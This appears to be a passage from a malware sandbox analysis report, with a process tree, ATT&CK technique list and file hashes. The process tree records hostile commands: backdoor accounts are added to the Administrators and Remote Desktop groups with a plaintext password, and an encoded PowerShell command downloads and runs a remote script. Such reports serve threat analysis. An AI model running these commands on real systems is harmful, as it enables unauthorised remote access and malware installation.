  net.exe LOCALGROUP "Remote Desktop Users" IXMQMCCR$ /ADD
  2⤵
  PID:4252

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" IXMQMCCR$ /ADD
1⤵
PID:2100

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:2472
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:1476

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:4828

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 3jeu472T
1⤵
PID:768
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 3jeu472T
  2⤵
  PID:3024

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 3jeu472T
1⤵
PID:4484

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:448
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:512

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:3952

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:1592
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2868
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1628

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES955A.tmp

Filesize
1KB

MD5
280d67764202e2afd5148a22b76b7e9d

SHA1
6aa5126c9aee71b26191be08caa0c60e02d7950f

SHA256
71dff9982909e6e968a634a32a506fba36737221b4471d016586f3dbf6e02a39

SHA512
1e4b1ecb1d9a36d12cb5026b5821dd7d620e3bf7d4b3ef60f07f4f28c45dc09ad66253311a5ad41a5065c20b61e5981c8a4d87305b651386b99f4f258c2e5c6e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_otxjoo44.x2d.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\opbuhnsc\opbuhnsc.dll

Filesize
3KB

MD5
9b56730454cf2a38edc6867369e630f9

SHA1
f15adc49c329aa16e2ebab362c117b842d77d19a

SHA256
57d8e25650d3ffcf4b0c52e88e7da0074c38d3aff461ea352963eb206ee3e5c8

SHA512
09a990cdc043ea5bc54a7ce1dbc3df0680fc1c550f05fe5c111b6c81a88ea935d3e9069ac6e03ea5c6b7961d9a1b7707689735eeaad0e6c84c713a8bad2e1741

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
142KB

MD5
4a136a1d5671523c03c4cce019fa0d0c

SHA1
4cf36a261a5b20717fe1442106f3b8951364d86b

SHA256
c324dcf989e77fb391cfccd1da09ad77ef10692dd0d7790549e37bf2ed1f9166

SHA512
fb15d0f5d53117c62b87ede1c956dde1142a28698a9871d893169e45f6f61db708756a71401ddf720667f97dfca63f04e52d83b0b87fd57f259839953462ed51

Download Submit
C:\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
3a434e30924f88a47fa7fc31e1821106

SHA1
b0d245fb30c2b311a2cdf7998c5109a2151cf5a4

SHA256
c1908713db3a7c8fa0dda2f4a332b00b7082910a08704d4b37b26f39f4712b28

SHA512
74c0a5382a725c78db73b9dcc71445747b05171dda27c21d6688800323fb3daf365d6ce05259415db7e7504f42e401a2535a25eefa49988c605ae2853413e84e

Download Submit
C:\Windows\Branding\mediasvc.png

Filesize
45KB

MD5
a642ebbca7caf498fa26f68d2e6235fb

SHA1
157fed9d6a60b095af1988f27720a129fd84d75b

SHA256
8b4f6094939e93c096839c7543ec96c680c505d5a2102e62dde6a9bd821d8cad

SHA512
ffce548ffac3bf0a90824696c0bf2395b8286f21b52c830207ffc1903ad40ec9bd660b45cf0221320274794e35ddcf8e188e4ab8cc7334c8d8f13e0d0b56c1ea

Download Submit
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIC7B5.tmp

Filesize
24KB

MD5
d0e162c0bd0629323ebb1ed88df890d6

SHA1
cf3fd2652cdb6ff86d1df215977454390ed4d7bc

SHA256
3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744

SHA512
a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\opbuhnsc\CSC4CEEC8B53C634BC991DED38B989BFB39.TMP

Filesize
652B

MD5
e6d000a27eb2f4d0b1956fed8d176d63

SHA1
7c244eed6e8221d15e63f78347b8905b7465297b

SHA256
6e8f375876e1535a9e03572a718ab27364413490493616a6fa1b7a6bc8c791af

SHA512
17ae2d45249a336ec4250fc4e3081c027863b6c0d77f0b281e0662a61e23c57b4e3f4eb15d253adb1569b3a73fdb1f104e06949e4262be53d4468c4f182d7ab4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\opbuhnsc\opbuhnsc.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\opbuhnsc\opbuhnsc.cmdline

Filesize
369B

MD5
e5e910b27a733ae8f7b62ddfcb6d88c3

SHA1
89b74e99eec8156de7d9f8898fe6be724eced1a7

SHA256
90f6dc5fce18e054eb75de65542857b04b6729eb346fc2162607fd7bf923f075

SHA512
ea600f0ad3340d6afb6288da311ec91c22270f4a747a616a7f3109863ad1bbda937969eed22ab0815d456192a34ed5e3c8d00893977b8cc0150c44750ec20a01

Download Submit
memory/1628-120-0x00000134AA320000-0x00000134AA330000-memory.dmp

Filesize
64KB

Download
memory/1628-117-0x00007FFBBDD30000-0x00007FFBBE7F1000-memory.dmp

Filesize
10.8MB

Download
memory/1628-153-0x00007FFBBDD30000-0x00007FFBBE7F1000-memory.dmp

Filesize
10.8MB

Download
memory/1628-119-0x00000134AA320000-0x00000134AA330000-memory.dmp

Filesize
64KB

Download
memory/1628-118-0x00000134AA320000-0x00000134AA330000-memory.dmp

Filesize
64KB

Download
memory/2008-49-0x000001C2E4270000-0x000001C2E4280000-memory.dmp

Filesize
64KB

Download
memory/2008-52-0x000001C2E4270000-0x000001C2E4280000-memory.dmp

Filesize
64KB

Download
memory/2008-53-0x00007FFBBDD30000-0x00007FFBBE7F1000-memory.dmp

Filesize
10.8MB

Download
memory/2008-51-0x000001C2E4270000-0x000001C2E4280000-memory.dmp

Filesize
64KB

Download
memory/2008-48-0x00007FFBBDD30000-0x00007FFBBE7F1000-memory.dmp

Filesize
10.8MB

Download
memory/2244-86-0x00007FFBC7120000-0x00007FFBC7139000-memory.dmp

Filesize
100KB

Download
memory/2244-87-0x000002B44E390000-0x000002B44E3A0000-memory.dmp

Filesize
64KB

Download
memory/2244-38-0x000002B44EE80000-0x000002B44F08A000-memory.dmp

Filesize
2.0MB

Download
memory/2244-37-0x000002B44EAF0000-0x000002B44EC66000-memory.dmp

Filesize
1.5MB

Download
memory/2244-159-0x00007FFBC7120000-0x00007FFBC7139000-memory.dmp

Filesize
100KB

Download
memory/2244-158-0x00007FFBBDD30000-0x00007FFBBE7F1000-memory.dmp

Filesize
10.8MB

Download
memory/2244-155-0x000002B44E390000-0x000002B44E3A0000-memory.dmp

Filesize
64KB

Download
memory/2244-13-0x00007FFBBDD30000-0x00007FFBBE7F1000-memory.dmp

Filesize
10.8MB

Download
memory/2244-12-0x000002B436260000-0x000002B436282000-memory.dmp

Filesize
136KB

Download
memory/2244-107-0x000002B44E390000-0x000002B44E3A0000-memory.dmp

Filesize
64KB

Download
memory/2244-15-0x000002B44E390000-0x000002B44E3A0000-memory.dmp

Filesize
64KB

Download
memory/2244-14-0x000002B44E390000-0x000002B44E3A0000-memory.dmp

Filesize
64KB

Download
memory/2244-20-0x000002B44E390000-0x000002B44E3A0000-memory.dmp

Filesize
64KB

Download
memory/2244-103-0x000002B44E390000-0x000002B44E3A0000-memory.dmp

Filesize
64KB

Download
memory/2244-34-0x000002B436250000-0x000002B436258000-memory.dmp

Filesize
32KB

Download
memory/2244-83-0x00007FFBBDD30000-0x00007FFBBE7F1000-memory.dmp

Filesize
10.8MB

Download
memory/3452-85-0x00000244FFCB0000-0x00000244FFCC0000-memory.dmp

Filesize
64KB

Download
memory/3452-3-0x00000244FFCB0000-0x00000244FFCC0000-memory.dmp

Filesize
64KB

Download
memory/3452-1-0x00007FFBBDD30000-0x00007FFBBE7F1000-memory.dmp

Filesize
10.8MB

Download
memory/3452-161-0x00007FFBBDD30000-0x00007FFBBE7F1000-memory.dmp

Filesize
10.8MB

Download
memory/3452-82-0x00000244FFCB0000-0x00000244FFCC0000-memory.dmp

Filesize
64KB

Download
memory/3452-81-0x00000244FFCB0000-0x00000244FFCC0000-memory.dmp

Filesize
64KB

Download
memory/3452-0-0x00000244B8430000-0x00000244B8856000-memory.dmp

Filesize
4.1MB

Download
memory/3452-80-0x00000244FFCB0000-0x00000244FFCC0000-memory.dmp

Filesize
64KB

Download
memory/3452-2-0x00000244FFCB0000-0x00000244FFCC0000-memory.dmp

Filesize
64KB

Download
memory/3452-50-0x00007FFBBDD30000-0x00007FFBBE7F1000-memory.dmp

Filesize
10.8MB

Download
memory/3452-4-0x00000244FFCB0000-0x00000244FFCC0000-memory.dmp

Filesize
64KB

Download
memory/4580-64-0x0000016624C30000-0x0000016624C40000-memory.dmp

Filesize
64KB

Download
memory/4580-67-0x00007FFBBDD30000-0x00007FFBBE7F1000-memory.dmp

Filesize
10.8MB

Download
memory/4580-65-0x0000016624C30000-0x0000016624C40000-memory.dmp

Filesize
64KB

Download
memory/4580-66-0x0000016624C30000-0x0000016624C40000-memory.dmp

Filesize
64KB

Download
memory/4580-63-0x00007FFBBDD30000-0x00007FFBBE7F1000-memory.dmp

Filesize
10.8MB

Download
memory/4796-68-0x00007FFBBDD30000-0x00007FFBBE7F1000-memory.dmp

Filesize
10.8MB

Download
memory/4796-78-0x000001A657380000-0x000001A657390000-memory.dmp

Filesize
64KB

Download
memory/4796-79-0x000001A657380000-0x000001A657390000-memory.dmp

Filesize
64KB

Download
memory/4796-84-0x00007FFBBDD30000-0x00007FFBBE7F1000-memory.dmp

Filesize
10.8MB

Download